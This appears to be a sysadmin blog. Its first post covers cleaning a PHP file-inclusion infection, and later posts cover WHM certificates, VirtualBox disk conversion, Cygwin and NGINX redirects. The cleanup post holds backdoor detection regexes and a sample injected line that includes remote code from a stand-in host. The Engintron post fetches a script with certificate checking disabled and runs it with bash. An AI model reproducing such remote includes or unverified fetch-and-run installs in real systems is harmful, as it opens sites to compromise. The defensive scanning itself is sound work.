How to clean up a File Inclusion attack

I recently helped a friend clean up an infection on their website. A hacker took advantage of some outdated plugins to sneak malicious code into the site. Following these steps I was able to find all the infected files, fix the vulnerability, and block the attacker's IP.

Find infected files

Open a shell and run this command to list all recently added files:

find ~/websitedirectory/ -name "*.php" -type f -ctime -30 | less

That lists all PHP files on the server whose status changed (created or modified) in the past 30 days.

Also, if you have Webalizer or AWStats available through your host, go through the logs and search for all requested files ending in .php; any core files, or files with random strings for names, should be reviewed.

Open one of the infected files; it may be including another file they slipped into your account, so track that down and delete it too. Also, try to find something particular in the code so you can use it as another way to track down infected files. In the shell, this command will search the contents of all PHP files for SOMETHING:

find ~/websitedirectory/ -name "*.php" -exec grep -l "SOMETHING" {} \;

Make a list of the locations of all backdoor files the hacker created; we'll be using those later.
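As an added example (not part of the original post), here is a Python script that combines the two steps above: it walks the site directory, keeps the PHP files changed in the last N days, and flags those containing patterns typical of injected backdoors and remote includes. The indicator list and the two sample files are constructed for this example; extend the list with whatever "SOMETHING" you found in your own infected file.

```python
import os
import re
import sys
import time

# Heuristic indicators common in injected PHP backdoors and file-inclusion payloads.
# Constructed for this example; add the specific string you found in your infected files.
INDICATORS = [
    ("eval-of-decoded-payload",
     re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("remote-or-user-controlled-include",
     re.compile(r"\b(include|require)(_once)?\s*\(?\s*(['\"]https?://|\$_(GET|POST|REQUEST|COOKIE))", re.I)),
    ("shell-exec-of-request-data",
     re.compile(r"\b(system|shell_exec|passthru|exec|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
    ("preg_replace-e-modifier",  # heuristic: pattern string whose modifiers include 'e'
     re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]")),
]
LONG_LINE = 1000  # obfuscated payloads are often dumped as one huge line

def suspicious_markers(source):
    """Return the indicator labels present in one PHP file's contents."""
    hits = [label for label, rx in INDICATORS if rx.search(source)]
    if any(len(line) > LONG_LINE for line in source.splitlines()):
        hits.append("very-long-line")
    return hits

def scan_tree(root, days=30):
    """Like the find command above: recent .php files (by ctime) that carry indicators."""
    cutoff = time.time() - days * 86400
    findings = {}
    for dirpath, _, names in os.walk(root):
        for path in (os.path.join(dirpath, n) for n in names if n.lower().endswith(".php")):
            if os.stat(path).st_ctime < cutoff:
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = suspicious_markers(fh.read())
            if hits:
                findings[path] = hits
    return findings

# Constructed, non-functional samples: one injected-looking file and one clean include.
SAMPLE_BACKDOOR = '<?php\n$blob = "...";\neval(base64_decode($blob));\ninclude("http://example.invalid/x.txt");\n'
SAMPLE_CLEAN = '<?php\nrequire_once __DIR__ . "/config.php";\necho htmlspecialchars($title);\n'

if __name__ == "__main__":
    for path, hits in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(path, ", ".join(hits))
```

Run it as `python scan.py ~/websitedirectory`; every path it prints deserves a manual look, and a clean report does not prove the site is clean.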

Clean the infection

If possible, delete the entire website and upload a copy from before the attack. If you can't delete everything, delete and re-upload as many folders as you can. For any folder you can't delete, take whatever steps you need to fix the infected files; this will vary based on the malicious code.

Prevent further infection

Update all your software and plugins to the latest version; if you're running something out of date, that's likely where they got in. Also, make sure your files all have the proper permissions. These commands set the usual permissions (644 for files, 755 for folders):

find ~/websitedirectory -type f ! -perm 644 -exec chmod 644 {} \;
find ~/websitedirectory -type d ! -perm 755 -exec chmod 755 {} \;

Reset all FTP and CMS account passwords.

And, as an added bonus, use that list of backdoor files to record the attackers' IPs. If you were able to get the correct IP addresses from Webalizer or AWStats, you can simply block those. If you're running cPanel, you can block IPs in Security > IP Deny Manager. If those tools didn't record the correct IPs, or you don't have them, you can use the list of backdoor files to capture the hacker's IP. Replace the code in those files with something like this:

<?php
$line = date('c') . ' ' . $_SERVER['REMOTE_ADDR'] . ' ' . $_SERVER['REQUEST_URI'];
file_put_contents('/home/websitedirectory/hackers.log', $line . PHP_EOL, FILE_APPEND);

That records the time, IP, and requested path of anyone who visits those files in hackers.log, so you can block them and stop them from fishing around in the future.
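As an added example (not from the original post), this Python script does the log-review step from above programmatically: given raw Apache/cPanel access-log lines and the list of backdoor paths from the first step, it reports which IPs requested those files, when they first did, and how often. The log lines, IPs, and paths below are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Apache/cPanel combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def attacker_ips(log_lines, backdoor_paths):
    """Map each client IP that requested a known backdoor to when, how often and which files.
    backdoor_paths are the web-facing URL paths of the files found in the
    'Find infected files' step; query strings are ignored when matching."""
    wanted = set(backdoor_paths)
    hits = defaultdict(lambda: {"first_seen": None, "count": 0, "paths": set()})
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        path = urlsplit(m.group("target")).path
        if path in wanted:
            rec = hits[m.group("ip")]
            rec["count"] += 1
            rec["paths"].add(path)
            rec["first_seen"] = rec["first_seen"] or m.group("time")
    return dict(hits)

def deny_list(findings):
    """IPs to paste into the host's IP deny tool, most active first."""
    return sorted(findings, key=lambda ip: (-findings[ip]["count"], ip))

# Constructed sample log lines (documentation-range IPs, made-up paths) for a dry run.
BACKDOOR_PATHS = ["/wp-content/uploads/cache.php", "/wp-includes/sys.php"]
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2017:03:12:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2017:03:14:07 +0000] "POST /wp-content/uploads/cache.php?x=1 HTTP/1.1" 200 88 "-" "curl/7.47.0"',
    '198.51.100.20 - - [10/Oct/2017:03:15:30 +0000] "GET /wp-content/uploads/cache.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2017:03:16:45 +0000] "GET /wp-includes/sys.php HTTP/1.1" 404 210 "-" "curl/7.47.0"',
    '192.0.2.10 - - [10/Oct/2017:03:17:02 +0000] "GET /about/ HTTP/1.1" 200 4096 "http://sub.domain.com/" "Mozilla/5.0"',
    'this line is garbage and must be skipped',
]

if __name__ == "__main__":
    found = attacker_ips(SAMPLE_LOG, BACKDOOR_PATHS)
    for ip in deny_list(found):
        print(ip, found[ip])
```

Feed it your real access log with `attacker_ips(open(path), paths)`; a 404 still counts, since the visitor was probing for the backdoor either way.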

Hopefully, that’ll do it!

It may not work for every infection, but it did the trick in this case. You'll want to replace ~/websitedirectory and /home/websitedirectory/hackers.log with paths that are relevant to your web server. Good luck!


Fixing subdomain folders with wildcard cert

This is something I've had to do twice now, and it's not all that hard, but I keep forgetting. The specific problem is when you have a wildcard security certificate for your domain, but your subdomain just points to the same folder as your primary domain – even though it works correctly when you access its insecure version.

I’m sure there are other causes and fixes for this, but I find what I need to do is:

  1. Log into WHM
  2. Search for "Install an SSL Certificate on a Domain"
  3. Then hit the "Browse Certificates" button
  4. Find the correct wildcard certificate and click the "Use Certificate" button
  5. Under "Domain", change "*.yourdomain.com" to "yoursubdomain.yourdomain.com"
  6. Then hit the Install button

And that should be all you need to do! You can repeat this for as many subdomains as you need. If you want to check which certificates you have installed, search for "Manage SSL Hosts" in WHM and it will list them there.


How to convert a VirtualBox VM to a bootable drive

This is quite easy, so I was surprised that I couldn't find a walk-through anywhere…so here's one :)  This is specifically for a VM of Ubuntu, so there may be other hurdles for different operating systems.

Step 1

Create a VM normally in VirtualBox (or use an existing one), install the operating system, and add any programs or files you want to have readily available on the bootable disk.

Step 2

This is the tricky part: you can use VirtualBox to convert a VDI to a raw disk image (given an .iso extension here), but you have to do it from the terminal. On my machine it wouldn't work at all in the default Windows terminal, but I have Cygwin installed and was able to use that. You first need to cd into the directory where VirtualBox is installed, then run the following command. The folder structure is specific to my machine and will most likely need to be changed on yours.

"/cygdrive/p/Programs/VirtualBox/VBoxManage.exe" clonehd 'F:/Documents/Virtualbox/Ubuntu_2017/Ubuntu 2017.vdi' 'F:/Documents/Virtualbox/Ubuntu_2017.iso' --format RAW

More simply, the command has this shape:

VBoxManage.exe clonehd 'vdi_location.vdi' 'where_generated_iso_will_be_location.iso' --format RAW

Step 3

Use Rufus to write the image to your USB drive as a bootable disk.

And that's about all you need to do! Then you can take a carbon copy of your VM with you wherever you go :)  Great for travelling, which was my need.

How to clone a specific snapshot

Basically, you need to replace the VDI path with the UUID of the specific snapshot you want. To get the UUID, go to:

File > Virtual Media Manager

Under Hard disks, find the VM you want; each snapshot is listed under it. Copy the UUID field from the snapshot you want and use this command instead in Step 2:

"/cygdrive/p/Programs/VirtualBox/VBoxManage.exe" clonehd UUID 'F:/Documents/Virtualbox/Ubuntu_2017.iso' --format RAW

More simply, the command has this shape:

VBoxManage.exe clonehd UUID 'where_generated_iso_will_be_location.iso' --format RAW


nodejs with Cygwin

I keep having to redo this, so I'm copying down the trick from this article here so I can find it in the future. To get NPM and NodeJS to work in Cygwin on Windows, you just have to alias them using these lines in your .bash_profile:

alias npm="/cygdrive/p/Programs/nodejs/npm.cmd"
alias node="/cygdrive/p/Programs/nodejs/node.exe"


Load balancing with WHM, NGINX, and mirrors

UPDATE 10/31/2017

I had to do a lot of server updates to get PHP7 running, and the process broke NGINX Admin, so I had to switch to Engintron. The install instructions for that are:

  1. cd /
  2. rm -f engintron.sh
  3. wget --no-check-certificate https://raw.githubusercontent.com/engintron/engintron/master/engintron.sh
  4. bash engintron.sh install



I have a project where I need to do a bit of load balancing to keep a website online for a very small window of time when it would receive an extremely high level of traffic.  I saw a dramatic increase in performance after simply installing NGINX, but I also wanted to be able to use mirrors and change the split of traffic during that peak time if we experienced any issues. NGINX does have a module for setting up upstream proxies to handle load balancing, but for this project redirects were simpler and more flexible.

This only applies to virtual private servers or dedicated hosting – you won't be able to run this kind of setup in a shared hosting environment. Start by installing NGINX; below are instructions for adding NGINX if your site is on cPanel.

  1. cd /usr/local/src
  2. wget http://nginxcp.com/latest/nginxadmin.tar
  3. tar -xf nginxadmin.tar
  4. cd publicnginx
  5. ./nginxinstaller install

You will also need to delete the automatically generated vhost file for the domain/subdomain you want to change, and you'll need to delete it again if you ever regenerate the vhosts. You can do this by:

  1. cd /etc/nginx/vhosts/
  2. rm sub.domain.com

NGINX comes with the split_clients module built in. This module is specifically designed for A/B testing, but it will also let you split your traffic between different sites and adjust how much traffic each site receives. If you're using NGINX CP as described above, you can either edit your NGINX config in WHM, or edit the file at "/etc/nginx/nginx.conf" from the shell. In my example below I am also using the $http_referer variable to set up a separate redirect specifically for direct traffic (requests with no referrer).

http {
	# Hash each client's IP into a bucket so a given visitor always gets the same mirror
	split_clients "${remote_addr}" $mirror {
		33%	"http://google.com";
		33%	"http://yahoo.com";
		*	"http://bing.com";
	}

	server {
		listen [::]:80;
		server_name sub.domain.com www.sub.domain.com;
		location / {
			add_header X-Cache "Redirect load balancing";
			# Direct traffic (no referrer) goes to its own mirror instead of the split
			if ($http_referer = "") {
				set $mirror "http://duckduckgo.com";
			}
			return 302 $mirror;
		}
	}
}
